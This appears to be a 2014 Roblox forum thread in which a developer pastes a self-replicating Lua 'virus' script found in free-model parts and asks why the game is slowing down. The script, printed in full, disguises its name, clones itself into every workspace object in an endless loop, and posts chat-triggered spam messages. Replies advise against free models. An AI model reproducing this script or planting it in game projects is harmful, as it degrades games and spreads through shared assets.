|
| 08 May 2014 10:48 AM |
So,my game began running slower,and Im trying to identify what made it slower.
And,what I found is,in every object,there are some random letters in the "Hole" object in every model/part.
This is what is inside each of them
names={"sosolid2k244 ", "IAmHereToHeålYourPlace", "FeelFreeToIns3rtGrammåticålErrorsHere", "ThisScriptIsAJumpStartToAHeålthyLifestyle", "FreeStyleMåyGoAnywhereIfNeeded", "3.14159265358979,ALotOfRåndomPiNumbers", "RandomåGoesHere:3", [[""''""''""å|`ç]], "77å", "å9001", "IStårtHere"} local NameCheck = false script.Parent.Name = names[math.random(1, #names)] script.Name = [[ProperGråmmerNeededInPhilosiphalLocations;insertNoobHere]] local c = script.Parent:Clone()
function addEvent(ch) wait(math.random()) NameCheck = false for ss = 1, #names do if ch:IsA("RotateP") or ch:findFirstChild(names[ss]) ~= nil then NameCheck = true end end if NameCheck == false then local cloak = c:Clone() cloak.Name = "" cloak:GetChildren()[1].Name = "" cloak.Parent = ch cloak.Name = names[math.random(1, 5)] end end
workspace.ChildAdded:connect(addEvent)
game.Players.PlayerAdded:connect(function(pl) pl.Chatted:connect(function(m) if m:sub(1, 5) == "/sc t" then local m = Instance.new("Message") m.Parent = workspace m.Text = "THEY CALL ME CRAZY" wait(1) m.Text = "lOoOoOoOp" wait(0.25) m.Text = "LoOoOoOoP" wait(0.25) m.Text = "lOoOoOoOp" wait(0.25) m.Text = "LoOoOoOoP" wait(0.25) m.Text = "lOoOoOoOp" wait(0.25) m.Text = "LoOoOoOoP" wait(0.25) m.Text = "GOTTA GOTTA BE CRAZY" wait(1) m.Text = "lOoOoOoOp" wait(0.25) m.Text = "LoOoOoOoP" wait(0.25) m.Text = "lOoOoOoOp" wait(0.25) m.Text = "LoOoOoOoP" wait(0.25) m.Text = "lOoOoOoOp" wait(0.25) m.Text = "LoOoOoOoP" wait(0.25) m.Text = "GOTTA GET A LIFE (YOU)" wait(3) m:remove() end if m:sub(1, 5) == "HAAXX" then local m = Instance.new("Message") m.Parent = workspace m.Text = "HAAXX" wait(3) m:remove() end end) end)
while true do local s = workspace:GetChildren() for i = 1, #s do NameCheck = false for ss = 1, #names do if s[i]:IsA("RotateP") or s[i]:findFirstChild(names[ss]) ~= nil then NameCheck = true end end if NameCheck == false then local cloak = c:Clone() cloak.Name = "" cloak:GetChildren()[1].Name = "" cloak.Parent = s[i] end wait(0.1) end wait(1) end
Please help me. |
|
|
| Report Abuse |
|
|
| 08 May 2014 10:51 AM |
| Oh and also each of the scripts name is "ProperGråmmerNeededInPhilosiphalLocations;insertNoobHere" |
|
|
| Report Abuse |
|
|
| 08 May 2014 10:51 AM |
yes it does. solution: dont add free models to your game
|
|
|
| Report Abuse |
|
|
| 08 May 2014 11:02 AM |
^
~masterCameron101, advanced Lua programmer, certified graphics designer and geek~ |
|
|
| Report Abuse |
|
|
| 08 May 2014 11:10 AM |
Thank you for being very kind to me.
===Leaving for future=== |
|
|
| Report Abuse |
|
|
| 08 May 2014 11:14 AM |
Heres what caused the virus.
id=38101859 |
|
|
| Report Abuse |
|